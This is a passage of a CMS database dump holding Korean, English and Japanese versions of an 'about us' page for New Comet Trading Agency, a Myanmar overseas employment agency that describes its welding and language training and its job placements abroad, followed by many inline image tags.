data-entity-uuid=\"b1eadb3f-c0b7-445e-aee6-f7523ba1158d\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-14_0.jpg\" data-align=\"center\" data-entity-uuid=\"676ffad7-c9a6-4d2a-9969-98e69477570c\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-15_0.jpg\" data-align=\"center\" data-entity-uuid=\"1131bddf-f0bb-4121-8c20-574a69c2e43d\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-16_0.jpg\" data-align=\"center\" data-entity-uuid=\"b0805653-8b57-493a-b7da-98b99b135795\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-17_0.jpg\" data-align=\"center\" data-entity-uuid=\"6e057327-e93f-41cc-a966-3bbfdb7046b0\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-18_0.jpg\" data-align=\"center\" data-entity-uuid=\"e2e7295f-d240-4c94-90f6-b52bc0c587bc\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-19_0.jpg\" data-align=\"center\" data-entity-uuid=\"1a08f51b-fce7-42d3-ae81-1ad523dfd3e1\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-20_0.jpg\" data-align=\"center\" data-entity-uuid=\"df97660b-54a9-403b-9796-90dcfbb580bd\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-21_0.jpg\" data-align=\"center\" data-entity-uuid=\"456bf806-4df8-483a-9bb9-78b3e285cd70\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-22_0.jpg\" data-align=\"center\" data-entity-uuid=\"81098b50-a382-45b2-b96a-44bb91384739\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-23_0.jpg\" data-align=\"center\" data-entity-uuid=\"6c66b62a-1389-4f5c-b496-bd6f105c4259\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-24_0.jpg\" data-align=\"center\" data-entity-uuid=\"f8bf2dde-b25f-46bb-bc27-d95b894955e3\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-25_0.jpg\" data-align=\"center\" data-entity-uuid=\"547038de-6845-4549-9311-0f02a922f630\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-26_0.jpg\" data-align=\"center\" data-entity-uuid=\"9c4a4a7d-81b0-4e33-b434-9e141438631c\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-27_0.jpg\" data-align=\"center\" data-entity-uuid=\"ab06b9a1-42d7-4f07-9be5-8a825c7fca60\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-28_0.jpg\" data-align=\"center\" data-entity-uuid=\"6e769851-41be-4e61-8110-5290daf2cda3\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-29_0.jpg\" data-align=\"center\" data-entity-uuid=\"ca9cad00-b0a2-4251-9585-5c48526f9748\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-40_0.jpg\" data-align=\"center\" data-entity-uuid=\"7d4ada41-9768-43b4-83b9-469cc689b193\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-41_0.jpg\" data-align=\"center\" data-entity-uuid=\"5f5513ae-611d-4f95-aaba-1227dc176b2c\" data-entity-type=\"file\">', '', 'full_html'),
('page', 0, 23, 276, 'ko', 0, '<p>저희 ``New Comet Trading\'\' 회사는 2004년에 설립되어 사업자등록번호(295/2004-2005)로 영업을 시작하였습니다.<br>뉴코멧 해외직업소개회사는 2023년 외국인고용업 면허를 취득하여 서비스 활동을 시작하였습니다.</p><p><br>저희 뉴코멧 해외직업소개회사 \"New Comet Overseas Employment Agency\"는자매 회사인 &nbsp;제야뉴코멧 자동차 판매 및 서비스 회사, 뉴코멧회사등 기업들과 협력하여 경제통상자원부에서 &nbsp;차량 수입허가를 신청했고 각종 상용트럭, 관광 산업 및 운송에 사용되는 다양한 유형의 버스 및 기계를 일본에서 직접 구매 판매하는 사업을 25년 이상 &nbsp;종사해 왔고 나라를 위한 정한 세금들을 냈습니다. 게다가100 명 이상의 직원에게 고용 기회를 제공했습니다.</p><p><br>또한 쌍둥이 회사인 뉴코멧건설 회사, 제야슈웨삐띡 건설 회사, 아웅네원 회사들은 정부 부처로부터 입찰 (tender)을 받고 건설 작업을 하는 동안 200명 이상의 직원에게 고용 기회를 제공했습니다.</p><p><br>저희 \"뉴코멧 해외 직업 소개회사\"는 한국 조선소로 취업을 희망하는 미얀마 각지에서 온 소수민족 형제들을 교통통신부 산하의 씬마락 (Sinmalike) 조선소에서 유능한 트레이너들와 함께 실력있는 용접공이 되도록 수업을 제공하고 있으며 관련 기업체로 취업할 수 있게 도와주고 있습니다.또한, 두바이, 말레이시아, 싱가포르, 태국, 일본 같은 국가에서 일하기를 원하는 청년들에게 취업 기회를 받알 수 있도록 &nbsp;서비스들을 제공하고 있습니다.</p><p><br>New Comet Trading Agency Co., Ltd.는 미얀마의 젊은 치누들이 일본의 개발한 첨단 기술을 배우고 꿈을 실현할 수 있도록 필요한 교육을 제공하고 돕고 있습니다.</p><p><br>일본으로 취업비자, 연수비자로 가기 위해 필요한 자격시험(JLPT, JFT, NAT-TEST, TOP-J)에 합격할 수 있도록 어학당도 개설 및 교육을 지원하고 있습니다.</p><p><br>저희는”뉴코멧 해외직업소개회사” 는 미얀마에서 우수한 기능인력을 배출하여 해외로 파견하는 서비스를 제공하기 위해 끊임없이 노력하고 있습니다.</p><img src=\"/sites/default/files/inline-images/1-NC_1.jpg\" data-align=\"center\" data-entity-uuid=\"7375e186-cf58-4d75-b92f-9eab22b78118\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-1_2.jpg\" data-align=\"center\" data-entity-uuid=\"d19e5ddf-b119-4ed3-ac45-b0803d864c96\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-2_1.jpg\" data-align=\"center\" data-entity-uuid=\"4dc4f426-e69c-44ec-8caf-4b1931fdf8b8\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-3_1.jpg\" data-align=\"center\" data-entity-uuid=\"f854e47f-d973-4dd9-8219-826768f1adc8\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-4_1.jpg\" data-align=\"center\" data-entity-uuid=\"13857fa4-2c7a-4d5b-990d-45454d4ce664\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-5_1.jpg\" data-align=\"center\" data-entity-uuid=\"c4d3c7e6-c2a6-47c1-a423-afbb8fed637d\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-6_1.jpg\" data-align=\"center\" data-entity-uuid=\"55284a88-e85b-4812-9ae7-807f898d55f7\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-7_1.jpg\" data-align=\"center\" data-entity-uuid=\"c2b2e5f4-fb99-4766-b2fd-9b2d6e680823\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-8_1.jpg\" data-align=\"center\" data-entity-uuid=\"0dfa63f3-2933-4e8b-842c-fb4562d7176d\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-9_1.jpg\" data-align=\"center\" data-entity-uuid=\"16e03ce5-055f-4f8f-8be5-1f11619e8445\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-10_1.jpg\" data-align=\"center\" data-entity-uuid=\"2a148620-3a3b-4fb9-8117-f6376f457d08\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-11_1.jpg\" data-align=\"center\" data-entity-uuid=\"87fee7fa-f754-4ed1-8b4c-e407735f3467\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-12_1.jpg\" data-align=\"center\" data-entity-uuid=\"9a88bbba-3b28-41fd-a8a8-84cca1770e30\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-13_1.jpg\" data-align=\"center\" data-entity-uuid=\"cbc0b282-1b93-4f31-a52e-e00ed85f6499\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-14_1.jpg\" data-align=\"center\" data-entity-uuid=\"8bba0525-3d17-4730-ac6a-43174e89662b\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-15_1.jpg\" data-align=\"center\" data-entity-uuid=\"5f6a15dd-8d0a-4102-b60c-36467fd6e2a0\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-16_1.jpg\" data-align=\"center\" data-entity-uuid=\"91065924-7e1b-40a5-a985-ab3a738841c7\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-17_1.jpg\" data-align=\"center\" data-entity-uuid=\"cd43fa36-c108-48c2-b25d-dc1862c70dea\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-18_1.jpg\" data-align=\"center\" data-entity-uuid=\"525a5838-a4d8-457f-97be-230841a5f654\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-19_1.jpg\" data-align=\"center\" data-entity-uuid=\"4b653764-4d92-4445-8e27-7614f6ef64a5\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-20_1.jpg\" data-align=\"center\" data-entity-uuid=\"e3ff3d3c-7c9e-462a-91f1-6c6a9aa06067\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-21_1.jpg\" data-align=\"center\" data-entity-uuid=\"d8dbbc11-8a02-4d92-beee-82d3aba0c040\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-22_1.jpg\" data-align=\"center\" data-entity-uuid=\"48756932-2a18-4eed-9166-8ae3d494765e\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-23_1.jpg\" data-align=\"center\" data-entity-uuid=\"f184253a-5469-4443-ad8a-350db9f4c92d\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-24_1.jpg\" data-align=\"center\" data-entity-uuid=\"a06d2513-b3b1-4975-8202-104c9b9ddf54\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-25_1.jpg\" data-align=\"center\" data-entity-uuid=\"3b495714-4bd4-411e-ae46-cc161a43ecd1\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-26_1.jpg\" data-align=\"center\" data-entity-uuid=\"d495b5fa-e307-41df-b301-614c7b02a674\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-27_1.jpg\" data-align=\"center\" data-entity-uuid=\"ad5dc94c-17ae-411f-99e9-6d1b74a22e99\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-28_1.jpg\" data-align=\"center\" data-entity-uuid=\"c3de86e8-0aee-413b-b2d5-5ba6506e8954\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-29_1.jpg\" data-align=\"center\" data-entity-uuid=\"7535e5c5-67cc-42fe-a4b1-8360b4e324d5\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-40_1.jpg\" data-align=\"center\" data-entity-uuid=\"1d69982c-23e7-4c63-b748-667e38a06b7f\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-41_1.jpg\" data-align=\"center\" data-entity-uuid=\"f37e9936-ed46-428b-abbb-f585384d411f\" data-entity-type=\"file\">', '', 'full_html'),
('page', 0, 23, 292, 'en', 0, '<p>We, ``NEW COMET TRADING\'\' company, was established in 2004 and started operating with company registration number (295/2004-2005).</p><p>NEW COMET TRADING AGENCY Co.,Ltd (New Comet Overseas Employment Agency) licence was obtained in 2023 and since then, the company has started to carry out service activities.</p><p>We, ``NEW COMET TRADING AGENCY\'\' company, which is a brother company, such as, ZEYA NEW COMET Auto Sale &amp; Services Co.,Ltd, NEW COMET Co.,Ltd, have applied for vehicle import permits from the Ministry of Economy and Commerce, and have been working for more than 25 years in the business of buying, importing and selling various types of business trucks, tourism and transportation buses and machinery directly from Japan, and have paid the taxes set for the state. More than 100 employees were given employment opportunities.</p><p>In addition, brother companies such as NEW COMET Construction Co.,Ltd, NEW ZAYYA SHWE PYI Construction Co.,Ltd, AUNG NAY WUN Construction Co.,Ltd and other companies have also successfully won tenders from government ministries and have provided employment opportunities to more than 200 employees.</p><p>Our company \"NEW COMET TRADING AGENCY “company is currently providing welding training courses to become qualified skilled workers at the Sinmalike Shipyard for ethnic brothers from all over Myanmar who want to work in Korea\'s shipyards and connect them with job opportunities.</p><p>In addition, we are connecting job opportunities for young people who want to work in countries such as Dubai, Malaysia, Singapore, Thailand, and Japan.</p><p>We at NEW COMET TRADING AGENCY Co.Ltd, are assisting on responsible for learning about Japan\'s developed advanced technologies, cultures and expressing their personal abilities and goals for the young generation in Myanmar.</p><p>In order to successfully pass the qualification tests (JLPT, JFT, NAT-TEST, TOP-J) required to go to Japan with a Work Visa and Training Visa, we are opening language training schools and providing teaching support.</p><p>We, \"NEW COMET TRADING AGENCY\" company, is constantly striving to provide services that produce talented skilled workers from Myanmar and send them to foreign countries.</p><img src=\"/sites/default/files/inline-images/1-NC.jpg\" data-align=\"center\" data-entity-uuid=\"1427dc29-05a8-43fe-8ca3-965d16ed0865\" data-entity-type=\"file\" alt=\"\"><img data-entity-uuid=\"b8d07038-b5d4-49f5-ac18-2a68edcf66f2\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-1.jpg\" data-align=\"center\"><p>&nbsp;</p><img src=\"/sites/default/files/inline-images/NC-2.jpg\" data-align=\"center\" data-entity-uuid=\"80e04f60-8b31-432d-8034-205f1107df2f\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-3.jpg\" data-align=\"center\" data-entity-uuid=\"e0e57835-6cc3-483a-895d-4d5108e80c57\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-4.jpg\" data-entity-uuid=\"9b3a507c-edd4-4ce3-b1a2-4936996fbe84\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-5.jpg\" data-align=\"center\" data-entity-uuid=\"9eac5e99-94a6-4dab-a71a-c4c7a78b8a7b\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-6.jpg\" data-align=\"center\" data-entity-uuid=\"99025867-1165-45b9-987a-162bd77afc85\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-7.jpg\" data-align=\"center\" data-entity-uuid=\"ab865942-61f8-4761-ac2c-b83b675886cf\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-8.jpg\" data-align=\"center\" data-entity-uuid=\"6eb2dc0f-9c32-4d4f-bb0a-7648ab39ab11\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-9.jpg\" data-align=\"center\" data-entity-uuid=\"810afaf6-ff82-44e0-b231-927e848a41cc\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-10.jpg\" data-align=\"center\" data-entity-uuid=\"3258c9ec-64da-4a37-9e22-cff0a7b23efc\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-11.jpg\" data-align=\"center\" data-entity-uuid=\"0f435fe2-d603-4e29-b1d6-f0cc0a29d626\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-12.jpg\" data-align=\"center\" data-entity-uuid=\"a095c373-2df3-4bba-be96-e259086824d6\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-13.jpg\" data-align=\"center\" data-entity-uuid=\"aeca03e1-f9a3-4e0e-b7b6-1660dbd60c8a\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-14.jpg\" data-align=\"center\" data-entity-uuid=\"99606141-7880-4242-9f8a-39d779b7c3f4\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-15.jpg\" data-entity-uuid=\"ebdb65e0-ba0b-4289-b787-403a08a7137c\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-16.jpg\" data-entity-uuid=\"89d8fc77-4e52-42ff-81bd-8cbddd3dfa5f\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-17.jpg\" data-align=\"center\" data-entity-uuid=\"9f81c640-bf3c-45f2-85d1-72c351c50da7\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-18.jpg\" data-align=\"center\" data-entity-uuid=\"eaba01fe-9f4f-4c78-b4f7-f966c16106b2\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-19.jpg\" data-align=\"center\" data-entity-uuid=\"28845640-721c-4663-99e4-3fe89a3fc124\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-20.jpg\" data-align=\"center\" data-entity-uuid=\"310286d4-6f8d-425b-b758-ba0c7a46a78c\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-21.jpg\" data-align=\"center\" data-entity-uuid=\"2a48e008-54b7-4ada-9bec-ec877fb83f54\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-22.jpg\" data-align=\"center\" data-entity-uuid=\"010a0743-1136-4045-92de-ffa7bb03b84f\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-23.jpg\" data-align=\"center\" data-entity-uuid=\"61230765-b357-46fe-a38d-1699896c48d6\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-24.jpg\" data-align=\"center\" data-entity-uuid=\"f940eee5-3ae3-4b94-9585-f317c7d9bcb8\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-25.jpg\" data-entity-uuid=\"e21d162f-6f5a-4935-bbcb-5001a8cba017\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-26.jpg\" data-align=\"center\" data-entity-uuid=\"00ae4e32-0e8a-4187-9efe-abfe0a26501b\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-27.jpg\" data-align=\"center\" data-entity-uuid=\"2989d3e0-2393-49ad-a73e-684f01edf0fa\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-28.jpg\" data-align=\"center\" data-entity-uuid=\"56339d67-286d-4418-9789-87b2f0456386\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-29.jpg\" data-align=\"center\" data-entity-uuid=\"b26a003e-c37f-4b76-bb1a-3b646ab2f771\" data-entity-type=\"file\"><img data-entity-uuid=\"e50b34c5-96f9-44a3-bc19-61e501f16184\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-40_2.jpg\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/NC-41.jpg\" data-align=\"center\" data-entity-uuid=\"d65558d3-211e-4a10-8124-f4f01a42f4b5\" data-entity-type=\"file\">', '', 'full_html'),
('page', 0, 23, 292, 'ja', 0, '<p>当社は2004年に設立され、登録ID(295/2004-2005)を取得し、以来サービスの提供を行ってきました。そして、2023年に当社ニューコメットトレンディング海外エージェンシーを設立し、運営を開始しました。<br>当社はニュー コメット トレーディング グループの一部である。その中で最大規模のゼーヤーニューコメット自動車売買&amp;サービス株式会社は自動車の輸入許可を得て、建設現場用のトラックや、交通機関として使われるバスや様々な機械を日本から直接輸入し、販売する事業を25年間続けてきました。納税もきちんと行い、100人の従業員を雇用するまでになりました。<br>また、グループの一部であるニューコメット建築株式会社、ゼッヤシェピーティー建築株式会社、アウンネーウィン建築株式会社も政府から許可を多く受け取り、合わせて200人以上の人材紹介に成功しております。<br>現在、ニューコメットトレンディング海外エージェンシーでは、ミャンマー全国から来た民族を問わずに韓国の造船所で働きたい人たちに対して、シンマライ湾岸で経験豊富な指導者たちの下で訓練を受ける機会を提供し、仕事の紹介を行っています。<br>さらに、ドバイ、マレーシア、シンガポール、タイ、日本への就職もサポートしています。<br>ミャンマーの若者たちが自分らしさを保ちながら、自分に合った仕事を見つけ、日本の技術を学ぶことができるように支援を続けています。日本語能力試験(JLPT, JFT, NAT-TEST, TOP-J)に合格した学生に対しては、ワークビザや研修ビザを取得するための支援を提供しています。<br>我々ニューコメットトレーディング海外エージェンシーは、経験豊富で能力の高い研修生を育成し、海外の仕事チャンスを提供することに尽力して参ります。</p><img src=\"/sites/default/files/inline-images/1-NC_0.jpg\" data-align=\"center\" data-entity-uuid=\"7147154e-6c57-4d0c-99dc-5e6a1ad56cc8\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-1_1.jpg\" data-align=\"center\" data-entity-uuid=\"0a8cade2-9871-451c-a978-1d09fd84f0de\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-2_0.jpg\" data-align=\"center\" data-entity-uuid=\"1c875d61-a0c2-42a5-b28e-ff5255dd8ad3\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-3_0.jpg\" data-align=\"center\" data-entity-uuid=\"80dbdd8c-e8cd-465b-b26c-e04b67966c31\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-4_0.jpg\" data-align=\"center\" data-entity-uuid=\"d71b12e7-3d70-4a59-9715-2de3919ebc7d\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-5_0.jpg\" data-align=\"center\" data-entity-uuid=\"8a845720-846c-47c3-b9e9-e1f3098f65fc\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-6_0.jpg\" data-align=\"center\" data-entity-uuid=\"b24eb73f-1d94-4450-81a5-afb6790a13f7\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-7_0.jpg\" data-align=\"center\" data-entity-uuid=\"51eb9cfb-ea78-4874-a2fb-af8d0ff97c38\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-8_0.jpg\" data-align=\"center\" data-entity-uuid=\"873929b2-4641-4686-834e-aa5ef5948b3a\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-9_0.jpg\" data-align=\"center\" data-entity-uuid=\"aa07abd4-d198-4e2c-af81-6f1eae19da17\" data-entity-type=\"file\" alt=\"\"><p>&nbsp;</p><img src=\"/sites/default/files/inline-images/NC-10_0.jpg\" data-entity-uuid=\"41991b55-c606-4270-9a2f-eb3871ba0f31\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-11_0.jpg\" data-align=\"center\" data-entity-uuid=\"7f57bb37-0f0d-4aea-be9b-4a52fc0adf6f\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-12_0.jpg\" data-align=\"center\" data-entity-uuid=\"88251347-e029-437d-9ff8-51f406d4402c\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-13_0.jpg\" data-align=\"center\" data-entity-uuid=\"b1eadb3f-c0b7-445e-aee6-f7523ba1158d\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-14_0.jpg\" data-align=\"center\" data-entity-uuid=\"676ffad7-c9a6-4d2a-9969-98e69477570c\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-15_0.jpg\" data-align=\"center\" data-entity-uuid=\"1131bddf-f0bb-4121-8c20-574a69c2e43d\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-16_0.jpg\" data-align=\"center\" data-entity-uuid=\"b0805653-8b57-493a-b7da-98b99b135795\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-17_0.jpg\" data-align=\"center\" data-entity-uuid=\"6e057327-e93f-41cc-a966-3bbfdb7046b0\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-18_0.jpg\" data-align=\"center\" data-entity-uuid=\"e2e7295f-d240-4c94-90f6-b52bc0c587bc\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-19_0.jpg\" data-align=\"center\" data-entity-uuid=\"1a08f51b-fce7-42d3-ae81-1ad523dfd3e1\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-20_0.jpg\" data-align=\"center\" data-entity-uuid=\"df97660b-54a9-403b-9796-90dcfbb580bd\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-21_0.jpg\" data-align=\"center\" data-entity-uuid=\"456bf806-4df8-483a-9bb9-78b3e285cd70\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-22_0.jpg\" data-align=\"center\" data-entity-uuid=\"81098b50-a382-45b2-b96a-44bb91384739\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-23_0.jpg\" data-align=\"center\" data-entity-uuid=\"6c66b62a-1389-4f5c-b496-bd6f105c4259\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-24_0.jpg\" data-align=\"center\" data-entity-uuid=\"f8bf2dde-b25f-46bb-bc27-d95b894955e3\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-25_0.jpg\" data-align=\"center\" data-entity-uuid=\"547038de-6845-4549-9311-0f02a922f630\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-26_0.jpg\" data-align=\"center\" data-entity-uuid=\"9c4a4a7d-81b0-4e33-b434-9e141438631c\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-27_0.jpg\" data-align=\"center\" data-entity-uuid=\"ab06b9a1-42d7-4f07-9be5-8a825c7fca60\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-28_0.jpg\" data-align=\"center\" data-entity-uuid=\"6e769851-41be-4e61-8110-5290daf2cda3\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-29_0.jpg\" data-align=\"center\" data-entity-uuid=\"ca9cad00-b0a2-4251-9585-5c48526f9748\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-40_0.jpg\" data-align=\"center\" data-entity-uuid=\"7d4ada41-9768-43b4-83b9-469cc689b193\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-41_0.jpg\" data-align=\"center\" data-entity-uuid=\"5f5513ae-611d-4f95-aaba-1227dc176b2c\" data-entity-type=\"file\">', '', 'full_html'),
('page', 0, 23, 292, 'ko', 0, '<p>저희 ``New Comet Trading\'\' 회사는 2004년에 설립되어 사업자등록번호(295/2004-2005)로 영업을 시작하였습니다.<br>뉴코멧 해외직업소개회사는 2023년 외국인고용업 면허를 취득하여 서비스 활동을 시작하였습니다.</p><p><br>저희 뉴코멧 해외직업소개회사 \"New Comet Overseas Employment Agency\"는자매 회사인 &nbsp;제야뉴코멧 자동차 판매 및 서비스 회사, 뉴코멧회사등 기업들과 협력하여 경제통상자원부에서 &nbsp;차량 수입허가를 신청했고 각종 상용트럭, 관광 산업 및 운송에 사용되는 다양한 유형의 버스 및 기계를 일본에서 직접 구매 판매하는 사업을 25년 이상 &nbsp;종사해 왔고 나라를 위한 정한 세금들을 냈습니다. 게다가100 명 이상의 직원에게 고용 기회를 제공했습니다.</p><p><br>또한 쌍둥이 회사인 뉴코멧건설 회사, 제야슈웨삐띡 건설 회사, 아웅네원 회사들은 정부 부처로부터 입찰 (tender)을 받고 건설 작업을 하는 동안 200명 이상의 직원에게 고용 기회를 제공했습니다.</p><p><br>저희 \"뉴코멧 해외 직업 소개회사\"는 한국 조선소로 취업을 희망하는 미얀마 각지에서 온 소수민족 형제들을 교통통신부 산하의 씬마락 (Sinmalike) 조선소에서 유능한 트레이너들와 함께 실력있는 용접공이 되도록 수업을 제공하고 있으며 관련 기업체로 취업할 수 있게 도와주고 있습니다.또한, 두바이, 말레이시아, 싱가포르, 태국, 일본 같은 국가에서 일하기를 원하는 청년들에게 취업 기회를 받알 수 있도록 &nbsp;서비스들을 제공하고 있습니다.</p><p><br>New Comet Trading Agency Co., Ltd.는 미얀마의 젊은 치누들이 일본의 개발한 첨단 기술을 배우고 꿈을 실현할 수 있도록 필요한 교육을 제공하고 돕고 있습니다.</p><p><br>일본으로 취업비자, 연수비자로 가기 위해 필요한 자격시험(JLPT, JFT, NAT-TEST, TOP-J)에 합격할 수 있도록 어학당도 개설 및 교육을 지원하고 있습니다.</p><p><br>저희는”뉴코멧 해외직업소개회사” 는 미얀마에서 우수한 기능인력을 배출하여 해외로 파견하는 서비스를 제공하기 위해 끊임없이 노력하고 있습니다.</p><img src=\"/sites/default/files/inline-images/1-NC_1.jpg\" data-align=\"center\" data-entity-uuid=\"7375e186-cf58-4d75-b92f-9eab22b78118\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-1_2.jpg\" data-align=\"center\" data-entity-uuid=\"d19e5ddf-b119-4ed3-ac45-b0803d864c96\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-2_1.jpg\" data-align=\"center\" data-entity-uuid=\"4dc4f426-e69c-44ec-8caf-4b1931fdf8b8\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-3_1.jpg\" data-align=\"center\" data-entity-uuid=\"f854e47f-d973-4dd9-8219-826768f1adc8\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-4_1.jpg\" data-align=\"center\" data-entity-uuid=\"13857fa4-2c7a-4d5b-990d-45454d4ce664\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-5_1.jpg\" data-align=\"center\" data-entity-uuid=\"c4d3c7e6-c2a6-47c1-a423-afbb8fed637d\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-6_1.jpg\" data-align=\"center\" data-entity-uuid=\"55284a88-e85b-4812-9ae7-807f898d55f7\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-7_1.jpg\" data-align=\"center\" 